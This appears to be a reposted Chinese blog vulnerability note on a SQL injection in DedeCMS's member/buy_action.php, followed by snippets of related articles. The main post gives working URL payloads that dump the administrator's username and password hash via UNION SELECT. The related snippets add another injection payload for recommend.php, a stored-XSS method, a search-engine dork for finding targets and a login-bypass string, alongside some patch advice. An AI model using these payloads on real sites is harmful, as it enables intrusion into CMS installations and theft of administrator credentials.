DedeCMS 支付页面注入漏洞

最新推荐文章于 2022-09-07 14:11:29 发布
最新推荐文章于 2022-09-07 14:11:29 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: sql 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_7z1/article/details/6587014
版权

发布日期:2011-03.23
发布作者:佚名

影响版本:dodecms.
官方网站:http://www.dedecms.com

漏洞类型:SQL注入

漏洞描述:DedeCMS. 织梦buy_action.php存在注入,可利用SQL查询代码爆管理员用户密码。

漏洞测试:

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

 

dedecms织梦安全设置漏洞修复大全
sqk210的博客
10-26 1517
  删除member special install 打开plus文件夹除了下面几个文件 其他删除 Img 文件夹,这个是主要是CSS样式在里面,所以保留,如果删除了,会造成发布文章时界面有点乱,所以要保留ad_js.php 这个文件时广告位,因为有些模板用到了后台调用广告位,如果你不确定,建议保留 Diy.php 这个是留言系统,有些模板上有用户在线留言功能,用到的就是这个,如果你不确定,...
织梦dedecms漏洞修复大全(5.7起)
东北狼仙
10-22 642
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复。修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记得先备份),这样的好处是防止用懒人包上传之后因为UTF8和GBK不同产生乱码,或者修改过这几个文件,然后直接修改的部分被替换掉,那之前就白改了,找起来也非常的麻烦。如果你搜索不到,...
DEDE织梦支付插件
08-28
本接口为小叮当支付接口,支持支付宝扫码和微信扫码,即时到帐免签约 使用说明: 1、将以上文件传到网站根目录,有同名文件请覆盖 2、在浏览器访问:http://您的网站域名/XddpayInstall.php,点安装 3、注册一个小叮当支付帐号:https://www.xddpay.com,登录后台【API接口】,添加接口,添加成功后就有ID和密钥了。添加接口的参数如下 同步跳转网址: http://您的网站域名/plus/carbuyaction.php?dopost=return&code=XddpayAlipay 异步通知网址:http://您的网站域名/XddpayNotify.php 4、在DEDE后台【系统】->【支付工具】->【支付接口设置】可以看到安装的接口 6、分别点击上图后面的【更改】,设置好步骤3创建接口的【接口ID】和【接口密钥】。 7、已经成功啦! 点卡、会员、商品均可使用小叮当支付
dedecms支付模块注入漏洞(alipay.php)
L_melody的博客
01-19 1954
文件:alipay.php 路径:.../include/payment/alipay.php 解决方案: 查找文件位置:/include/payment/alipay.php,大概在137行左右,找到: $order_sn = trim($_GET['out_trade_no']); 修改为: $order_sn = trim(addslashes($_GET['out_tr...
dedecms织梦支付模块注入漏洞导致SQL注入修复
09-07 459
阿里云提示:织梦dedecms支付模块注入漏洞导致SQL注入修复方法。打开/include/payment/alipay.php文件。
阿里云提示:织梦dedecms 支付模块注入漏洞导致SQL注入修复
zxy840552216的博客
07-09 202
阿里云提示:织梦dedecms 支付模块注入漏洞导致SQL注入修复方法。又是哪里有问题呢,文件在include/payment/下面include/payment/alipay.php文件,搜索(大概在137行的样子) 1 $order_sn = trim($_GET['out_trade_no']); 修改为 1 $order_sn = trim(addslashes($_GET['out_trade_no'])); 老规
/dede/plus_bshare.php,DEDE CMS 最新漏洞整理 - 接dedecms挂马防护、漏洞处理
weixin_33970994的博客
03-23 393
dedecms支付模块注入漏洞:引起的文件是/include/payment/alipay.php问题解决:找到:$order_sn = trim($_GET['out_trade_no']);将其修改为如下代码:$order_sn = trim(addslashes($_GET['out_trade_no']));-----------------------------------------...
DedeCMS 存储型xss漏洞1
08-03
要利用此漏洞,攻击者需要能够访问并操作DedeCMS后台的“系统”->“支付工具”->“配送方式设置”,在那里他们可以添加一个新的配送方式,将XSS payload 输入到“简要说明”字段中。一旦数据保存到数据库,payload ...
DedeCms v5.6 GBK模板定制】:网页布局与设计的专业技巧
![商业源码-编程源码-DedeCms v5.6...首先概述了模板定制的重要性与基础理论,包括对DedeCms模板结构、标签系统以及数据关联原理的深入解析。随后,文章详细阐述了网页布局设计的理论基础和CSS应用技巧,以及如何在模板
dedecms注入漏洞
aomi6689的博客
12-05 2927
版本:Powered byDedeCMSV57_GBK© 2004-2011DesDevInc. 漏洞利用EXP:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,...
阿里云安骑士dedecms漏洞 汇总
weixin_30481087的博客
12-05 249
原文地址 :http://www.yushitianxia.com/mianfei/mianfeijiaocheng/dedecms/36.html 阿里提示dedecms cookies泄漏导致SQL漏洞article_add.php的解决方法 漏洞名称:dedecms cookies泄漏导致SQL漏洞 补丁文件:/member/article_add.php 补丁来源:云盾自研 漏...
DEDECMS织梦内容管理系统安全设置(防范网站注入挂马)
IT技术宅-北方的刀郎
03-21 6487
“dede”太脆弱了,早不用早解脱”,“DEDE安全吗,怎么总是被入侵挂马? ”,“天,怎么回事,又被挂马了”经常能碰到这样的抱怨。不“人云亦云”这是无忧主机(www.51php.com)一贯的观点。如果织梦网站管理系统(dedeCMS),真的那么脆弱,那么容易被挂马,那为什么还那么多人选择使用它?据我所知,dede管理系统是有非常多的用户群体的。“网站没有绝对的安全,只有勤劳的站长”我在“无忧主
DedeCMS_v5.7漏洞复现
热门推荐
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5723
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3930
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
Dedecms recommend.php SQL注入漏洞
网站守护中心
04-13 2246
Dedecms recommend.php SQL注入漏洞描述: 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。 危害: 被SQL注入后可能导致以下后果: 1.网页被篡改 2.数据被篡改 -Dedecms recommend.php SQL注入
DedeCMS注入爆管理员用户密码方法
weixin_30265171的博客
04-27 529
搜索关键词:powered by dedecms首先注册个用户,注册地址:/member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号:/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%...
web 织梦cms 支付宝府支付功能实现办法
qq_37860926的博客
05-16 2124
CMS和支付功能的完美结合,配上DedeCMS健壮的模板功能为我们的站长DIY 自己的网站提供了强有力的支持,具有更大的灵活性和稳定的性能,为了让我们的站长能够尽快使用起我们的CMS系统,支付宝公司提供了 “支付宝单笔1.5%接口”免费签约,让您立刻体验网上交易。点击以下按钮,马上体验。 立刻申请 因支付宝账户认证升级,为了您能签约成功,请仔细阅读“操作指南” 具体操作: 第一步:如果您还没有支付...
dedecms注入爆管理员用户密码方法
K的博客
08-23 5844
dedecms注入爆管理员用户密码方法 2014年03月04日18:24 阅读: 1209 次 标签: dedecms注入爆管理员用户密码方法 关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?produ
dedecmsSQL注入漏洞复现
最新发布
12-06
DedeCMS是一款流行的内容管理系统(CMS),但在过去的一些版本中存在SQL注入漏洞SQL注入是一种通过将恶意的SQL代码插入到应用程序的输入字段中,从而控制数据库执行非预期操作的攻击方式。以下是DedeCMS SQL注入漏洞复现的步骤: ### 步骤一:环境搭建 1. **下载DedeCMS**:从官方网站或其他可信来源下载DedeCMS的旧版本(存在漏洞的版本)。 2. **安装DedeCMS**:按照官方文档的步骤进行安装,确保数据库和Web服务器(如Apache或Nginx)正常运行。 ### 步骤二:识别漏洞 1. **查找注入点**:常见的注入点包括搜索功能、登录功能等。假设我们使用搜索功能作为注入点。 2. **构造恶意输入**:在搜索框中输入带有SQL注入的恶意输入。例如,`' OR '1'='1`。 ### 步骤三:执行SQL注入 1. **测试注入**:在搜索框中输入测试语句,观察页面响应。如果页面返回了异常的结果或错误信息,说明存在SQL注入漏洞。 2. **提取数据**:使用SQL注入技术提取数据库中的数据。例如,使用`UNION SELECT`语句结合`information_schema.tables`表来获取表名。 ### 步骤四:利用漏洞 1. **获取数据库信息**:通过SQL注入获取数据库版本、用户信息、数据库名等信息。 2. **获取表和列信息**:利用`information_schema`数据库获取表名和列名。 3. **提取数据**:根据获取的表名和列名,提取具体的数据。 ### 步骤五:修复漏洞 1. **更新DedeCMS**:升级到最新版本,修复已知的SQL注入漏洞。 2. **代码审计**:对代码进行审计,修复所有可能的注入点。 3. **使用参数化查询**:确保所有数据库查询都使用参数化查询,防止SQL注入。 ### 示例代码 以下是一个简单的示例,展示如何通过SQL注入获取数据库版本信息: ```sql SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''; ``` 通过这种方式,攻击者可以绕过身份验证,获取所有用户的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值